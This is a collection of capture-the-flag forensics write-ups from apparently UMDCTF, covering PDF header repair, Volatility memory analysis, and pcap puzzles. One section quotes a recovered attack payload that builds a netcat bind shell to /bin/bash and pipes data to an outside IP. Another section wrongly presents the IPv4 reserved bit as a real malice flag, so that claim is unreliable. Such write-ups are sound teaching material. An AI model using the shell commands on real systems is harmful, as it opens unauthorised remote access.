Sensitive
Category: Forensics
Points: 150
Description:
Author: Lumpus
Hint: “Not sure what to make of this…”
Given: File named “sensitive”
Writeup
The file didn’t have any extension added to the end so I couldn’t tell the type of file, so I ran the “file” command on Linux. It told me it was a data file, which doesn’t give much help.
I opened the file in HxD (a hex editor) and noticed that it was a PDF via the header and footer.
PDF Header:
25 50 44 46 (in hex) = %PDF (in ASCII)
PDF Footer:
0A 25 25 45 4F 46 (.%%EOF)
0A 25 25 45 4F 46 0A (.%%EOF.)
0D 0A 25 25 45 4F 46 0D 0A (..%%EOF..)
0D 25 25 45 4F 46 0D (.%%EOF.)
After some analysis, I realized there was an extra “20” hex value for every other character, which was probably the reason the file was corrupted. I tried to find simple commands to do something like remove every other character, but gave up on that.
I ended up writing a simple python program which did that for me and created a new file. See script below:
This opened up a PDF with the UMD CSEC logo and a QR code that was VERY transparent. All it took was a little messing around with the contrast and brightness and my QR reader picked it up.
Flag
UMDCTF-{l0v3-me_s0meh3x}
Resources
Jarred1
Category: Forensics
Points: 200
Description:
Link: https://drive.google.com/open?id=1g0j7rm53lU7ZRBM8XgkPkFpUgsfXpjfi
Files given:
1. System.map-5.3.0-18-generic
2. module.dwarf
3. lubuntu-Snapshot2.vmem
Writeup
I didn’t really know what to do with this at first because I was unfamiliar with these types of files. After some research, I found that the System.map and module.dwarf files are used to form a Linux profile. The other file is a virual memory file which I think might be taken from a VM or just a linux machine.
After more research, I figured I should clone Volatility code, which is how you can load and analyze memory files.
- In whichever directory, do a git clone on:
git clone https://github.com/volatilityfoundation/volatility.git
- Package the System.map and module.dwarf files into a zip file
zip $(lsb_release -i -s)_$(uname -r)_profile.zip module.dwarf System.map-5.3.0-18-generic
-
Move the zip file to volatility/volatility/plugins/overlays/linux/
-
I got the profile name by running:
python vol.py --info | grep Linux
My profile name is LinuxUbuntu_4_4_0-17763-Microsoft_profilex64
- You can figure out what you can get out of the memory by running:
python ./vol.py --info | grep -i linux_
We see that we can see the bash command history with linux_bash
- The command to run is:
sudo python vol.py -f ../lubuntu-Snapshot2.vmem --profile=LinuxUbuntu_4_4_0-17763-Microsoft_profilex64 linux_bash
The output was:
Pid Name Command Time Command
-------- -------------------- ------------------------------ -------
1825 bash 2019-11-13 03:59:04 UTC+0000 how do I linux?
1825 bash 2019-11-13 03:59:21 UTC+0000 UMDCTF-{falskdfklashdkjfhaskljfhakljsdhflkjasdhflkashdk}
1825 bash 2019-11-13 04:00:22 UTC+0000 echo -n "VU1EQ1RGLXtKYXJyZWRfU2gwdWxEX0hhVjNfTDBjazNkX0gxc19DT21wdTdlcn0=" | base64 -d | sha256sum
1825 bash 2019-11-13 04:01:32 UTC+0000 UMDCTF-{STRINgz_W0n't_Get_Th3_FLVG}
I obviously tried the last command as a flag, but it didn’t work (shocker). It looked like the 3rd command could be of use. I copied the command to my terminal and ended up getting the flag: UMDCTF-{Jarred_Sh0ulD_HaV3_L0ck3d_H1s_COmpu7er}
Flag
UMDCTF-{Jarred_Sh0ulD_HaV3_L0ck3d_H1s_COmpu7er}
Resources
-
https://www.linkedin.com/pulse/linux-memory-analysis-how-start-what-you-need-know-james-bower/
-
https://github.com/volatilityfoundation/volatility/wiki/Linux
-
https://resources.infosecinstitute.com/memory-forensics-and-analysis-using-volatility/#gref
-
https://www.andreafortuna.org/2019/08/22/how-to-generate-a-volatility-profile-for-a-linux-system/
Nation State Musical
Category: Forensics
Points: 300
Description:
Author: t0pc4r
Hint: “Oh no! It looks like a nation state is trying to attack one of UMDs routers! Using a pcap generated from the attack, try to determine which nation state the attack is coming from.
Beware, you only have five guesses.
The flag will be in the format UMDCTF-{Country}”
Note: “Do not attempt to communicate with or contact any of the IP addresses mentioned in the challenge. The challenge can and should be solved statically.”
Given: Pcap file “attack.pcap”
Writeup
Looking at the pcap file, we can see there are A LOT of TCP packets from ONE source to ONE destination. I ran a whois on the source IP address, which showed that the IP was from Ukraine, but that’s too easy.
I looked at the pcap file a little more to realize that one of the TCP packets had data associated to it. I did a quick hex to ascii and the output was:
ÿþ';
rm -f backd00r
mkfifo backd00r
nc -lk 1337 0<backd00r | /bin/bash 1>backd00
echo '<5= :V@5<V=' | nc 37.46.96.0 1337
I can see that another IP addressed is being used, so I ran another whois on this other IP. The IP was from Kazakhstan, so I tried the flag, UMDCTF-{Kazakhstan} and it worked.
There is probably an explanation to why this IP address is the actual source of the attacks, but I’m not too sure what it is.
Flag
UMDCTF-{Kazakhstan}
Nefarious Bits
Category: Forensics
Points: 400
Description:
Author: t0pc4r
Hint: “After being exposed to some solar radiation, it looks like some bits have turned bad. It is your job to figure out what they are trying to say.”
Note: “Do not attempt to communicate with or contact any of the IP addresses mentioned in the challenge. The challenge can and should be solved statically.”
Given: Pcap file “attack.pcap”
Writeup
When I opened the pcap file, there wasn’t much to look at. Pretty much just TCP transmissions from ONE source to ONE destination.
I noticed that a few fields were changing throughout the 200-something packets in the file. The source port went up by one every time, the TCP checksum changes by a constant little bit every time, and one of the IPv4 flags were changing randomly.
With this knowledge, I didn’t think I could do anything with the first two fields I saw changing. It would make sense that the checksum was changed by the source port changing every packet. I took a closer look at the IPv4 flag changing every time and saw it was called the “Reserved bit”
After some research, I found at that the reserved bit is used to indicate whether a packet has been sent with malicious intent or not (1 or 0). With this in mind, the fact that it was varying like binary data would vary, and the hint, I assumed that the 200-something packets were using this field for binary data.
I exported the pcap file to a CSV and removed all of the columns except for the field I wanted. I named it “test.csv” for the script. My script printed out the binary for this pcap. See script “nefarious.py”
Flag
UMDCTF-{3vil_b1ts_@r3_4lw4ys_3vi1}